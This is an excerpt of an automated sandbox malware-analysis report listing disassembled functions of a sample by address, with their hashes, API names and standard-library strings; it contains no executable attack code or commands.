                              • Opcode ID: 46a200c358b377f20c210a09f35d88695f1da571afdb25d25f675fc30eeb136d
                              • Instruction ID: e5649706ee02d7b5ee496e8072dd424a208cdf5e8e7e7bfa5867e76383b6d041
                              • Opcode Fuzzy Hash: 46a200c358b377f20c210a09f35d88695f1da571afdb25d25f675fc30eeb136d
                              • Instruction Fuzzy Hash: 8FC2B733A0C6819AE7B19F25A000B2AF7A1FB85784F508135FE9E63B95DB3DE4419F50
                              Function 00007FF733B37380 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 199COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                              • API String ID: 3510742995-126128797
                              • Opcode ID: f175edec715792faf5f06dbd0469631ae384200092bb13ce8422dc551446cdc7
                              • Instruction ID: 169629006440842cde4544f6f3d7bf800a07aee43cb79a80f6b280e108a5b2dc
                              • Opcode Fuzzy Hash: f175edec715792faf5f06dbd0469631ae384200092bb13ce8422dc551446cdc7
                              • Instruction Fuzzy Hash: EF512573B09B5191FB61AF25F4401A8A3A0E714FA8F848232DAAC237C1DE3DD5D2D321
                              Function 00007FF733B36BC0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 199COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                              • API String ID: 3510742995-126128797
                              • Opcode ID: e142b179d9f740dba2e158650b5e7930e31d6a37e42731d5f6aa2e03c234175e
                              • Instruction ID: 221ebc9e7fdc6b2ba17e75f24efd758c4262f46918b13912705b3357c5679a1f
                              • Opcode Fuzzy Hash: e142b179d9f740dba2e158650b5e7930e31d6a37e42731d5f6aa2e03c234175e
                              • Instruction Fuzzy Hash: AD51E773B05B5190FBA1AF25F4802A8A364E715FA4FC48232CA9C27785DE3DD5D2D311
                              Function 00007FF733AA4980 Relevance: 8.1, APIs: 5, Instructions: 567COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: localeconvmemset
                              • String ID:
                              • API String ID: 2367598729-0
                              • Opcode ID: 0ddaac80bb762076b11f066fceec65eeb064ecdd49bd77496fca8741fd0bfc0b
                              • Instruction ID: a2f95f8378245f05a31616bbcfc6553dc521705e80bf9ab6d890d902242d78d3
                              • Opcode Fuzzy Hash: 0ddaac80bb762076b11f066fceec65eeb064ecdd49bd77496fca8741fd0bfc0b
                              • Instruction Fuzzy Hash: 96222423B1C29266F7F5AE248044B7DA691EF40740FC58135FA6E677C5CE3DE880A7A0
                              Function 00007FF733A9D0C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: signal
                              • String ID: CCG
                              • API String ID: 1946981877-1584390748
                              • Opcode ID: 16cec4eb3580fed3f61c5ba8310e824dbc75016ddb678646f9f531c733956718
                              • Instruction ID: 8004da137e7f4bf12f1a421687973e13ef3e138e4af89f8bcad9ece1491bf986
                              • Opcode Fuzzy Hash: 16cec4eb3580fed3f61c5ba8310e824dbc75016ddb678646f9f531c733956718
                              • Instruction Fuzzy Hash: F921D622E0C60A62FEF932548C50739A1819F46790FE94936E62EB73E1CD1CE8C1A331
                              Function 00007FF733B33D20 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 155COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: basic_string::_M_create
                              • API String ID: 2221118986-3122258987
                              • Opcode ID: bdb589609e6d906720990f52bfbfd59ba5193de90097ef4182752ff965e08f6b
                              • Instruction ID: b1e01360aa826f8d3a7d096327a57e3692a13e08b322a854a276affeaa5e5b53
                              • Opcode Fuzzy Hash: bdb589609e6d906720990f52bfbfd59ba5193de90097ef4182752ff965e08f6b
                              • Instruction Fuzzy Hash: 1741E763A09A9150FAB1AF25F8402B9E690A759BF0F8C8231CFED577C1DE3DD4819321
                              Function 00007FF733B30940 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 182COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: locale::_Impl::_M_replace_facet
                              • API String ID: 0-4011348548
                              • Opcode ID: f512086dd08c1badcdd39ba152230951775aa81170823a6358aab3e5df42141e
                              • Instruction ID: 401db6ef9cc358a06c153ea8448dea929470a551a08ace979b597dbe61d73c0f
                              • Opcode Fuzzy Hash: f512086dd08c1badcdd39ba152230951775aa81170823a6358aab3e5df42141e
                              • Instruction Fuzzy Hash: 82612262B05B5191EFA4AF1AD440278A360EF84FF8F904335CEAE277D0DE2ED4919351
                              Function 00007FF733B37610 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: basic_string::_M_create
                              • API String ID: 2221118986-3122258987
                              • Opcode ID: 4042682bfb61f08d51a44aa51f4a6a59bea2949f487c421b3a356a2651171baa
                              • Instruction ID: 8dccfe4e3895c08d2d44e126c36c92776f2c6da4af3bf10168ba24a66ba10fae
                              • Opcode Fuzzy Hash: 4042682bfb61f08d51a44aa51f4a6a59bea2949f487c421b3a356a2651171baa
                              • Instruction Fuzzy Hash: BA31C3B3A09B9191EB75AF19F8403A8E2A0A7157B0F988234DBED177D1DE3DD482D311
                              Function 00007FF733AAB2C0 Relevance: 4.6, APIs: 3, Instructions: 82COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: DebuggerExceptionPresentRaisefree
                              • String ID:
                              • API String ID: 462861877-0
                              • Opcode ID: f03ce9b29cbd40283660c348c4d7fcfd71c74e0092b58aac382728cd9d1d992c
                              • Instruction ID: dd719f873cffb733f0eaa2f1242def16079925dd826d5f7faea5667a9b6950e3
                              • Opcode Fuzzy Hash: f03ce9b29cbd40283660c348c4d7fcfd71c74e0092b58aac382728cd9d1d992c
                              • Instruction Fuzzy Hash: 3D21E823B193456AFAB6BB65A400779D2D4EF447A4F840234EF6D16BD0DF7CE444A270
                              Function 00007FF733B348A0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 66COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: basic_string::_M_create$basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
                              • API String ID: 2221118986-670834496
                              • Opcode ID: cb5788d93baa05acf3ae71668c1f67740377d324d5e85c7242c94c42273f266b
                              • Instruction ID: 60971559ac68bb8d1ca13efe66263f5ec1ac532e1e06c6a80d9924f2925908d0
                              • Opcode Fuzzy Hash: cb5788d93baa05acf3ae71668c1f67740377d324d5e85c7242c94c42273f266b
                              • Instruction Fuzzy Hash: B8110A62E09A5290FE70AB25E84007CD361AB55BE0FD48231C69D277D1DE2EE4D2A311
                              Function 00007FF733AC8220 Relevance: 4.2, APIs: 2, Instructions: 1699COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: wcslen
                              • String ID:
                              • API String ID: 4088430540-0
                              • Opcode ID: 564fca2d8403d5f5ef4de36a28bcb5a26e393168904defc9e515718736eee198
                              • Instruction ID: 9d246b730b624fe972797c5b22e9faf9a5c1631d752612d48b6f0756cb9b0d32
                              • Opcode Fuzzy Hash: 564fca2d8403d5f5ef4de36a28bcb5a26e393168904defc9e515718736eee198
                              • Instruction Fuzzy Hash: 70F27D36A08B9596EBB09B25E4447BEB7A4FB84B84F804522EECD53B98DF3CD441D710
                              Function 00007FF733A95220 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 621COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: decltype(nullptr)
                              • API String ID: 0-1940065048
                              • Opcode ID: 521ea2833cbd36a6c718bb7831ab72ee67310ff20df1e0d2cd4523005eabe793
                              • Instruction ID: 56e3240d9cdb3c51a9b71d287d105cd5bc52500df19080bc035b4be0d5928a9f
                              • Opcode Fuzzy Hash: 521ea2833cbd36a6c718bb7831ab72ee67310ff20df1e0d2cd4523005eabe793
                              • Instruction Fuzzy Hash: 2D321851E0D24E65FBF86A159C02B79A7C29F52BD0FC88031EA4D377C6DD2CE991A360
                              Function 00007FF733ADD212 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 336COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733B090D0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF733B11B31), ref: 00007FF733B090FC
                              • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733ADD6C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memchrmemset
                              • String ID: /
                              • API String ID: 3758419703-2043925204
                              • Opcode ID: 559d600bf9463c30aeb9fe21ec8509bceba61a742a53c2cec9f6b4f1eb33ac27
                              • Instruction ID: 73d69ef697252fb194433b692565fbd4bdbabf5ed7c5a3ec88cabae4baf796d4
                              • Opcode Fuzzy Hash: 559d600bf9463c30aeb9fe21ec8509bceba61a742a53c2cec9f6b4f1eb33ac27
                              • Instruction Fuzzy Hash: 43E18123608B42D1EBB4AA29A06477EB7A1FF81768F940231EA9D167E4DF3CD445A710
                              Function 00007FF733AF5570 Relevance: 3.2, APIs: 2, Instructions: 683COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: wcslen
                              • String ID:
                              • API String ID: 4088430540-0
                              • Opcode ID: 198404d0077c21d5e0c66f2fa2775266c967e3b1b69ede4148b4e137533ad84e
                              • Instruction ID: 49413424833ca2f8ed7a1a2649a67ddd57a1e90f479a01f3feefc1a3ab36b995
                              • Opcode Fuzzy Hash: 198404d0077c21d5e0c66f2fa2775266c967e3b1b69ede4148b4e137533ad84e
                              • Instruction Fuzzy Hash: 5F52D522A09A9591EBB0AF29D844BBDB760FB44B95F814532FE8D23794DF3DD441E320
                              Function 00007FF733B37040 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: basic_string::_M_create
                              • API String ID: 3510742995-3122258987
                              • Opcode ID: eba7150c2a35ce809a9e01ad25fd3a5f2f21eab15065fa4cfa75c7b320ebd30f
                              • Instruction ID: ab19bb7d3c2f9c755719e984970aaa15e6a71b91d595822c14bbf0b4fb320b9d
                              • Opcode Fuzzy Hash: eba7150c2a35ce809a9e01ad25fd3a5f2f21eab15065fa4cfa75c7b320ebd30f
                              • Instruction Fuzzy Hash: 7D4126B3704B9192E7A08F19E8413ACFBA1EB45B90F988234DBAC17B90DB3EC441D311
                              Function 00007FF733B278A6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B2792A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: f54ccf41c2d2b45833d69199ff166eddd0b0817765fb8571fed7c58625f54df2
                              • Instruction ID: 1a32236bf793984404b6f297d132a3ec547ecaad4d95d776d3ddd9ae8b43d9e2
                              • Opcode Fuzzy Hash: f54ccf41c2d2b45833d69199ff166eddd0b0817765fb8571fed7c58625f54df2
                              • Instruction Fuzzy Hash: 2F112362E0935275FBA5BB26A5122B8A2545B01BD0F849131DD8D23782EE2CD5829311
                              Function 00007FF733B276B6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B2773A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: 4cd326765fddf6ee5ae50fb6fe893d70e89acdbe86aaa600a8a96f25d9ecc1a4
                              • Instruction ID: cdfcf37dd096fd39a34dfca1633235b0c1556c464ad5dae501ace1d7b6dd0195
